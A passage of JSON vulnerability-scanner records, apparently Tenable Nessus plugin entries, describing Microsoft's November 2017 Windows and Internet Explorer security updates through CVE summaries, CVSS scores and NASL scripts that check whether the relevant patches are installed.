follow redirect requests that should otherwise be\n ignored. An attacker who successfully exploited the\n vulnerability could force the browser to send data that\n would otherwise be restricted to a destination website\n of the attacker's choice. (CVE-2017-11872)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11830)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2017-11863)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11836,\n CVE-2017-11839, CVE-2017-11840, CVE-2017-11841,\n CVE-2017-11861, CVE-2017-11866, CVE-2017-11873)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2017-11833)", "edition": 32, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-14T00:00:00", "title": "KB4048953: Windows 10 Version 1607 and Windows Server 2016 November 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11839", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11836", "CVE-2017-11840", "CVE-2017-11831", "CVE-2017-11830", "CVE-2017-11873", "CVE-2017-11872", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11861", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768", "CVE-2017-11866"], "modified": "2017-11-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_NOV_4048953.NASL", "href": "https://www.tenable.com/plugins/nessus/104549", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104549);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-11768\",\n \"CVE-2017-11788\",\n \"CVE-2017-11791\",\n \"CVE-2017-11827\",\n \"CVE-2017-11830\",\n \"CVE-2017-11831\",\n \"CVE-2017-11833\",\n \"CVE-2017-11834\",\n \"CVE-2017-11836\",\n \"CVE-2017-11837\",\n \"CVE-2017-11838\",\n \"CVE-2017-11839\",\n \"CVE-2017-11840\",\n \"CVE-2017-11841\",\n \"CVE-2017-11842\",\n \"CVE-2017-11843\",\n \"CVE-2017-11846\",\n \"CVE-2017-11847\",\n \"CVE-2017-11848\",\n \"CVE-2017-11849\",\n \"CVE-2017-11850\",\n \"CVE-2017-11851\",\n \"CVE-2017-11853\",\n \"CVE-2017-11855\",\n \"CVE-2017-11856\",\n \"CVE-2017-11858\",\n \"CVE-2017-11861\",\n \"CVE-2017-11863\",\n \"CVE-2017-11866\",\n \"CVE-2017-11869\",\n \"CVE-2017-11872\",\n \"CVE-2017-11873\",\n \"CVE-2017-11880\"\n );\n script_bugtraq_id(\n 101703,\n 101705,\n 101706,\n 101709,\n 101711,\n 101714,\n 101715,\n 101716,\n 101719,\n 101721,\n 101722,\n 101723,\n 101725,\n 101727,\n 101728,\n 101729,\n 101732,\n 101733,\n 101734,\n 101735,\n 101737,\n 101738,\n 101740,\n 101741,\n 101742,\n 101748,\n 101749,\n 101751,\n 101753,\n 101755,\n 101762,\n 101763,\n 101764\n );\n script_xref(name:\"MSKB\", value:\"4048953\");\n script_xref(name:\"MSFT\", value:\"MS17-4048953\");\n\n script_name(english:\"KB4048953: Windows 10 Version 1607 and Windows Server 2016 November 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4048953.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles redirect requests. The\n vulnerability allows Microsoft Edge to bypass Cross-\n Origin Resource Sharing (CORS) redirect restrictions,\n and to follow redirect requests that should otherwise be\n ignored. An attacker who successfully exploited the\n vulnerability could force the browser to send data that\n would otherwise be restricted to a destination website\n of the attacker's choice. (CVE-2017-11872)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11830)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2017-11863)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11836,\n CVE-2017-11839, CVE-2017-11840, CVE-2017-11841,\n CVE-2017-11861, CVE-2017-11866, CVE-2017-11873)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2017-11833)\");\n # https://support.microsoft.com/en-us/help/4048953/windows-10-update-kb4048953\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?119c56db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4048953.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11847\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-11\";\nkbs = make_list('4048953');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"11_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4048953])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T06:19:36", "description": "The remote Windows host is missing security update 4048961\nor cumulative update 4048958. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)", "edition": 38, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-14T00:00:00", "title": "Windows 8.1 and Windows Server 2012 R2 November 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11831", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_NOV_4048958.NASL", "href": "https://www.tenable.com/plugins/nessus/104554", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104554);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-11768\",\n \"CVE-2017-11788\",\n \"CVE-2017-11791\",\n \"CVE-2017-11827\",\n \"CVE-2017-11831\",\n \"CVE-2017-11834\",\n \"CVE-2017-11837\",\n \"CVE-2017-11838\",\n \"CVE-2017-11842\",\n \"CVE-2017-11843\",\n \"CVE-2017-11846\",\n \"CVE-2017-11847\",\n \"CVE-2017-11848\",\n \"CVE-2017-11849\",\n \"CVE-2017-11850\",\n \"CVE-2017-11851\",\n \"CVE-2017-11853\",\n \"CVE-2017-11855\",\n \"CVE-2017-11856\",\n \"CVE-2017-11858\",\n \"CVE-2017-11869\",\n \"CVE-2017-11880\"\n );\n script_bugtraq_id(\n 101703,\n 101705,\n 101709,\n 101711,\n 101715,\n 101716,\n 101719,\n 101721,\n 101722,\n 101725,\n 101729,\n 101737,\n 101738,\n 101740,\n 101741,\n 101742,\n 101751,\n 101753,\n 101755,\n 101762,\n 101763,\n 101764\n );\n script_xref(name:\"MSKB\", value:\"4048961\");\n script_xref(name:\"MSKB\", value:\"4048958\");\n script_xref(name:\"MSFT\", value:\"MS17-4048958\");\n script_xref(name:\"MSFT\", value:\"MS17-4048961\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 November 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4048961\nor cumulative update 4048958. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\");\n # https://support.microsoft.com/en-us/help/4048961/windows-81-update-kb4048961\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dd6d4c6a\");\n # https://support.microsoft.com/en-us/help/4048958/windows-81-update-kb4048958\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6b7fa1d0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4048961 or Cumulative update KB4048958.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11847\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-11\";\nkbs = make_list('4048961', '4048958');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"11_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4048961, 4048958])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T06:19:37", "description": "The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)", "edition": 32, "cvss3": {"score": 7.5, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-30T00:00:00", "title": "Security Updates for Internet Explorer (November 2017)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11791", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", 